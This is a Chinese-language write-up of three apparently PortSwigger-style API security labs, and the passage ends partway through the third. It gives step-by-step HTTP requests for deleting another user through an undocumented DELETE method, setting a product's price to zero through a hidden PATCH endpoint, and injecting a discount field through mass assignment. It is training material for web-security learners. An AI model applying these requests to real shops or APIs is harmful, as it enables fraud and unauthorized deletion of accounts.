第一關[Easy]: Exploiting an API endpoint using documentation
目標是刪carlos
在更新自己郵箱的介面可以抓到一個PATCH請求,請求的URI是:
/api/user/wiener
(URI生成邏輯可以在前端js找到,👇前端js)
const changeEmail = (form, e) => {
e.preventDefault();
const formData = new FormData(form);
const username = formData.get('username');
const email = formData.get('email');
fetch(
`${form.action}/${encodeURIComponent(username)}`, // <-----------注意看這裡
{
method: 'PATCH',
body: JSON.stringify({ 'email': email })
}
)
.then(res => res.json())
.then(handleResponse(displayErrorMessage(form)));
};
響應是:
{"username":"wiener","email":"123@123.com"}
發一個OPTIONS請求看它支援的請求方法,返回包顯示支援DELETE.
對/api/user/carlos 發起delete請求,請求體為{"username":"carlos","email":"123@123.com"}
過關.
第二關[Normal]:Lab: Finding and exploiting an unused API endpoint
奇怪的支付漏洞,目標是零元購皮夾克
隱藏的api ,用PATCH方法改一下價格即可過關
按一下按鈕把這個夾克加到購物車,抓請求包:
/api/products/1/price
響應包:
{"price":"$1337.00","message":"24 people are watching this item right now"}
發OPTIONS包,它支援:
Allow: GET, PATCH
把首部改成PATCH (PATCH /api/products/1/price HTTP/2),發包,得到相應包:
{"type":"ClientError","code":400,"error":"Only 'application/json' Content-Type is supported"}
新增頭Content-Type:application/json ,並在請求體新增倆花括號{} (json資料),發包,得到相應包:
{"type":"ClientError","code":400,"error":"'price' parameter missing in body"}
在請求體新增
{"price":0}
改了夾克的價格,然後把夾克買了就行
第三關[Normal]:Lab: Exploiting a mass assignment vulnerability
這關是有個隱藏的折扣引數,找到就行:
登陸後點購物車按鈕會對 /api/checkout 發起GET請求,響應包為:
{"chosen_discount":{"percentage":0},"chosen_products":[{"product_id":"1","name":"Lightweight "l33t" Leather Jacket","quantity":3,"item_price":133700}]}
發現了一個percentage引數👆這個引數代表折扣
在購物車點place order按鈕(支付按鈕)並抓請求包:
{"chosen_products":[{"product_id":"1","quantity":3}]}
把上邊抓到的"chosen_discount":{"percentage":0}新增到這裡,得到👇
\